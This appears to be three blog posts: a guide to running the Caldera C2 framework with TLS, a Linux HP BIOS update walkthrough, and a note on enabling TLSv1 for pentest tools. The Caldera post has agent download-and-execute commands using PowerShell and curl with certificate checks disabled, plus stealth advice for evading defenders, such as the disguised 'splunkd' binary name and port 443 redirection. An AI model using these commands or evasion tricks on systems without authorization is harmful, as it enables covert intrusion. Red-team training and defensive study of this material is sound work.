Caldera v.5 as a Non-Root User with Encryption

Recently got to see Caldera in action. It's certainly an interesting platform that offers some useful C2 functionality, reporting, and ATT&CK technique mapping. As such I thought it would be a good tool to setup and learn how to better use for myself. Reading into Caldera, I saw that it supported TLS (through it's confusingly named plugin called 'SSL plugin') which is arguably a must for C2 to be useful/hidden.

Virtual Machine Setup

1. Devuan 5 (effectively Debian 12 bookworm)
2. Single network interface (eth0)
3. Internet access for Caldera/repo access
4. 2 CPU cores and 8GB of ram - Suggestion but can probably be lower

We'll start the instructions here assuming that Devuan is already installed and fully updated. The default Devuan install will need some modifications to apt's sources.list file, mainly that contrib and non-free sources will need to be added. This can be easily accomplished with sed as the root user. With apt configured properly, most of the rest of the system dependencies can be installed.

root@Devuan:~# sed -i 's/ main / main contrib non-free /' /etc/apt/sources.list

root@Devuan:~# apt install libucl1 zlib1g haproxy golang-1.19 python3-venv python3-pip openssl iptables

root@Devuan:~# apt install npm --no-install-suggests --no-install-recommends

In order to save space on the system, the second and third commands are intentionally two separate commands! There is one dependency that is still needed and while the package is available in the repositories, it's currently not packaged for Devuan 5/Debian 12. None the less, it can still be pulled and installed without issues from an older release of Devuan/Debian. The package is upx-ucl. NOTE: Make sure to get the one for the proper CPU architecture of the system (the system in this guide is an x86_64).

root@Devuan:~# wget -c http://deb.devuan.org/merged/pool/DEBIAN/main/u/upx-ucl/upx-ucl_3.95-1_amd64.deb && dpkg -i upx-ucl_3.95-1_amd64.deb

Caldera Installation

At this point, all of the system-wide dependencies should be installed. The next steps will proceed as the non-root user that caldera will be run as. For the purposes of this article the username of 'user' will be used.

user@Devuan:~$ cd /home/user

user@Devuan:~$ git clone https://github.com/mitre/caldera.git --recursive

The above will clone Caldera into a folder located at /home/user/caldera. For the purposes of not trampling on system python libraries and due to Mitre providing a requirements.txt file, a python virtual environment will be used to maintain the required dependencies for Caldera.

user@Devuan:~$ python3 -m venv /home/user/caldera && cd /home/user/caldera

user@Devuan:~/caldera$ source bin/activate

Notice that the prompt will change once the python virtual environment has been activated! This is important in order to install Caldera's dependencies into the Caldera virtual environment. For more information about python virtual environments, check out this article about why to use them.

(caldera) user@Devuan:~/caldera$ pip3 install -r requirements.txt

If all goes well with pip3 installing the requirements. It's time to build the web interface. If Caldera is going to be used via remote systems, ie not accessed from the machine that Caldera is installed on, there is one change that needs to be done before building the server.

(caldera) user@Devuan:~/caldera$ sed 's|VITE_CALDERA_URL=.*|VITE_CALDERA_URL=http://|' plugins/magma/.env.template > plugins/magma/.env

At this point Caldera can be launched and run on the default ports without encryption. NOTE: The --build part needs to be run and complete at least once before moving on to the rest of this guide!

(caldera) user@Devuan:~/caldera$ python3 server.py --insecure --build

Now from another machine, navigate to http://<CALDRA_IP>:8888 and login with the default credentials of red/admin or blue/admin depending on which "team" you're wanting to leverage.

TLS Configuration

Once it is confirmed that Caldera is working or if just skipping ahead to get the TLS configuration, ensure Caldera isn't currently running (ctrl+c will stop caldera if it was launched following the previous instructions). The first thing that needs to be done is the creation of a certificate and associated key. Some thought should be placed into this step as the normal process will generate a self-signed certificate which comes with its own set of problems. Regardless, this guide will continue with a self-signed cert.

(caldera) user@Devuan:~/caldera$ cd /home/user/caldera/plugins/ssl

(caldera) user@Devuan:~/caldera/plugins/ssl$ openssl req -x509 -newkey rsa:4096 -out conf/caldera_cert.pem -keyout conf/caldera_cert.pem.key -nodes

Openssl will prompt for some of the fields to be set in the certificate. It is highly recommended to change these from the defaults.

The next step is to configure haproxy to use this certificate. Mitre provides a haproxy template where all that needs configured is the path to the certificate.

(caldera) user@Devuan:~/caldera/plugins/ssl$ cp templates/haproxy.conf conf/

(caldera) user@Devuan:~/caldera/plugins/ssl$ sed -i 's|bind \*:8443 ssl .*|bind \*:8443 ssl crt plugins/ssl/conf/caldera_cert.pem|' conf/haproxy.conf

The final step is to enable the Caldera SSL plugin in the configuration file.

(caldera) user@Devuan:~/caldera$ cd ~/caldera && sed '/- training/a - ssl' conf/default.yml > conf/local.yml

Final System Configuration

With the certificate and associated key configured, there are a few system tasks that need to be configured now. The first is that the user's enviornment path variable is unlikely to contain the path necessary for Caldera to call haproxy. On Devuan if the user's path is compared to the location of haproxy on the system, one can see that there is a disconnect.

(caldera) user@Devuan:~/caldera$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

(caldera) user@Devuan:~/caldera$ ls -l /usr/sbin/haproxy 
-rwxr-xr-x 1 root root 3140224 Dec 16 10:41 /usr/sbin/haproxy

As can be seen, user's path doesn't include the /usr/sbin directory. Easy fix by adding it to the user's path variable in the ~/.bashrc file.

caldera) user@Devuan:~/caldera/plugins/ssl$ echo "$PATH:/usr/sbin" >> ~/.bashrc

The next step necessary is to configure the system to allow the user to raise the number of open file descriptors as needed by haproxy. PAM on Linux systems will easily allow this to occur (need root privileges to do this). In order for the previous changes to take effect, a logout and login will be needed.

root@Devuan:~# echo "user hard nofile 45000" > /etc/security/limits.d/caldera_haproxy.conf

Finally! At this point, Caldera should be setup and the system configured to allow a non-root user to launch caldera.

(caldera) user@Devuan:~/caldera$ cd ~/caldera && python3 server.py

Extra OPSEC item

If one is looking to keep things a bit more stealthy, it would be wise to leverage iptables/nftables to port redirect TCP/443 (normal HTTPS port) to TCP/8443 (Caldera's default https port when running as a non-root user). The below iptables commands will redirect inbound TCP/443 to TCP/8443 and it will redirect outbound TCP/8443 to TCP/443!

root@Devuan:~# iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8443

root@Devuan:~# iptables -t nat -I OUTPUT -o eth0 -p tcp --sport 8443 -j REDIRECT --to-ports 443

NOTE: These iptables rules are one offs and would need to be run every time the system is rebooted and other existing rules need to checked to ensure the rules are placed appropriately on the system. If interested in making these rules persistent, check out the iptables-save command from iptables-persistent package in Devuan/Debian!

Using with agents

With the above code, caldera agents can now be pointed to standard https:// links rather than having to specify a port as well (ports aren't common in URL's and might seem suspicious to blue team analysts). One point to keep in mind is that this guide is using a self-signed cert so in order for common operating system tools to trust the cert, insecure flags will need to be used.

For the Powershell agent download, the following string can be added to Calreda's commands to instruct Powershell to ignore the self-signed certificate.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Make sure that the code snippet goes before the actual call to download the file. For example in the standard sandcat agent:

$server="https://<SERVER_IP_OR_HOSTNAME>";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$data=$wc.DownloadData($url);
[... Truncated ...]

Similar functionality exists for the Linux agents as well. To do this with the Linux agents a curl argument to not check certificates (--insecure or -k) can be added to Caldera's commands.

server="https://<SERVER_IP_OR_HOSTNAME>";
curl -s --insecure -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
./splunkd -server $server -group red -v

Calderad Service?

If there's interest, I've also written up an init script/program to start, stop, and restart Caldera as configured above as a system service. I'd be happy to share the conf files if desired (may end up throwing them into a repo as well, I'll update this article with links if I do).

Upgrading HP BIOS with Linux

It never fails that vendors update firmware on systems but neglect to provide an easy way for anyone outside of Windows an easy way to apply the updates. HP tends to be one of my favorite vendors as they tend to support the open-source community when possible but recently a laptop needed a UEFI (BIOS) update. This happens on a fairly regular basis and each time I always think to myself that I should document how to do this since I always have to fight with the update to get it to install without needing FreeDOS or booting Windows on the laptop.The laptop in question today was an HP Elitebook that had a BIOS update available but no means to install via a Linux distribution. Not to worry though as it is still possible to this update without Windows or FreeDOS.

In order to perform this update process a Linux system and a USB drive will be needed. The Linux system in this scenario is again an HP Elitebook. The USB drive doesn't need to be a large USB drive, the device only needs about 32 MB of space but it is crucial that the device not contain any important files! This USB drive will be formatted and all data will be lost. The next thing to do is to download the BIOS update from HP's site. Many times in order to get the update from HP's site, one will need to act as though the computer is running Windows. Accomplishing this is as simple as visiting the HP support site and selecting Windows as the operating system.

By selecting Windows as the OS, the HP site will continue on to the software updates. Selecting the All drivers followed by BIOS category will show the most recent BIOS update. Simply click the download button to obtain the executable; don't worry that it is an exe.

Now open a terminal, plug in the USB drive, and let's prepare the USB drive. The first step is to locate the device name of the USB drive and then format it properly. In order to accomplish this, the user will require sudo or root rights on the system the USB drive is plugged into. To find the device name of the USB device, the 'lsblk' tool will be leveraged. As seen in the figure below, the USB drive that will be used in this article is /dev/sdc and is highlighted in green. WARNING: Triple check the device name before continuing as permanent data loss may follow!

With the proper USB drive name, the drive can now be prepared by partioning and creating a filesystem on the device. The 'fdisk' utility can be leveraged to quickly create a new partition on the located USB drive. WARNING: Make absolutely sure that the proper device is picked for the fdisk command! Command used echo -e 'n\np\n1\n\n1048576\nw\n' | fdisk /dev/sdc

Now the 'mkfs.fat' utility can be used to format the newly created partition; /dev/sdc1 on this system. WARNING: Make sure to confirm the partition name before continuing! Command used mkfs.fat -F 16 /dev/sdc1. Once the device has been formatted, it will need to be mounted to the Linux system where the BIOS update was downloaded and then a specific folder structure created in preparation for the update files. Commands used: mount /dev/sdc1 /mnt && mkdir -p /mnt/Hewlett-Packard/{BIOS/New,BIOSUPDATE}.

Now that the USB drive is prepared, let's extract the necessary files from the HP update downloaded previously. In a terminal window, navigate to the folder where the file was downloaded. Leveraging the '7z' tool, the contents of the update can be extracted. Command used: 7z e sp146435.exe

With the files extracted, the BIOS binary update file should be copied to the USB drive. The BIOS binary file will be the file ending in .bin and it should be moved to /mnt/Hewlett-Packard/BIOS/New/ folder. Command used: cp *.bin /mnt/Hewlett-Packard/BIOS/New/

Once the files are moved, make sure to sync the device and properly eject the USB drive from the system. Command used: sync;sync; umount /mnt && eject /dev/sdc.

Now remove the USB drive and plug it into the HP laptop that the BIOS update was intended. Note that the laptop will need to have a charged battery as well as be running with the AC adapter connected! With the USB drive plugged into the laptop, turn the machine on and press the escape (esc) key when the HP logo is seen. The startup menu will load and towards the bottom of the menu will be an option to update the system's BIOS. Use the arrow keys or mouse to highlight that option and select it.

The next screen will prompt for confirmation to install the new BIOS firmware. Simply click on the button that says Update BIOS - X.XX.

This will start the update process which might take some time. Simply wait for the process to complete. There will likely be multiple reboots in order for the process to complete. Remain patient!

This particular HP laptop rebooted on its own and continued the BIOS installation process. Again this is normal. Do not remove the USB drive or the AC power supply!

After another reboot, the laptop booted back into my normal Linux distribution and a quick look at the BIOS version with dmidecode showed that the laptop was now reporting the new version of the BIOS software from HP! Hopefully this is helpful for other Linux users out there wishing to keep their BIOS versions updated.

TLSv1 and Pentesting Woes

While testing a system today I ran into a webserver that was shockingly still requesting/supporting TLSv1. While TLSv1 has been around for a long time, most browsers/clients will be configured to not attempt to negotiate TLSv1 or TLSv1.1. For end-users, this is great from a security standpoint but from a pentesting stand point, we may still need to interact with that system! 

The system today caused errors with everything from OWASP ZAP to Nikto to even the CuRL utility! Luckily Parrot OS (and most other Linux systems) support configuration changes to allow the system and tools to still communicate with an old system running a TLSv1/TLSv1.1 webserver. 

First off here were some of the errors I was getting while trying to interact with the system.

• ZAP - The server selected protocol version TLS10 is not accepted by client preferences [TLS13, TLS12]
• CuRL - error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
• Nikto - No web server found on X.X.X.X:443 (This one was odd as the error was not particularly indicative of the underlying error)
• nmap - No clear error messages but nmap failed to really be able to determine anything about the website/webserver
  

Now before beginning; Obligatory disclaimer. WARNING: Following the next steps will lower the security of the system! It is HIGHLY recommended that these steps not be performed on a system that is used for sensitive operations such as logging into email, bank accounts, credit card providers, etc. These steps are meant to enable a dedicated penetration testing station to access older crypto systems. I take zero responsibility for any damages that come from following this guide!

Disclaimer out of the way, let's walk through how to configure OpenSSL to allow older TLS versions system wide first. On many Linux systems, the system wide OpenSSL configurations are usually stored in the openssl configuration file ( /etc/ssl/openssl.cnf on ParrotOS and many other Debian systems). Within this file, there is a section labeled '[system_default_sect]'. On the current version of Parrot OS, the systems settings will look like this:

[system_default_sect]
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2

To allow the system to connect to order TLS modes, the settings can be changed to the following:

[system_default_sect]
MinProtocol = TLSv1
CipherString = DEFAULT

Save the changes and it should be noted that many command line tools are likely to start communicating with TLSv1 systems. Take a look at the difference in CuRL with the change versus after the change in the below screenshot (Top error is MinProtocol set to TLSv1.2 and the bottom is TLSv1; The self-signed cert is a completely different issue).

The above solved the issue for many of the command line and other system tools but firing up ZAP later presented the same issue even though other tools were working just fine. Turns out that ZAP, since it relies on JAVA, had it's own configuration parameters that take priority over the system level configuration. Getting ZAP to ignore TLSv1 was a two step process. The first step is changing JAVA's security configuration as well as enabling ZAP to use TLSv1.

Let's first set JAVA's security to support TLSv1. In Parrot, and many other Debian based systems, the JAVA security settings are configured in the file /etc/java-11-openjdk/security.java.security. Within this file, locate the configuration option labeled jdk.tls.disabledAlgorithms. One will notice that TLSv1 and TLSv1.1 are disabled by default.

To enable JAVA's support for TLSv1 and TLSv1.1, simply remove those two options from the line and save the changes. NOTE: Remember this will affect all applications that use JAVA on the system!

Now to get ZAP to scan a site utilizing TLSv1/TLSv1.1. With the JAVA changes saved, launch ZAP. Once ZAP launches, navigate to Tools -> Options.

Once the menu loads, scroll to the 'Network' section and then click on the 'Connection' option. Within this menu area, there will be a number of security protocols that can be selected. Notice that TLS 1 and TLS 1.1 won't currently be checked but can be selected by clicking the check box next to them.

Click okay and then begin scanning the TLSv1 enabled website! 

 

As a final reminder, following these instructions will lower the security of a system. Penetration testing systems like Parrot and Kali shouldn't be used for normal daily tasks and the changes made in these instructions should be reverted once the need has passed!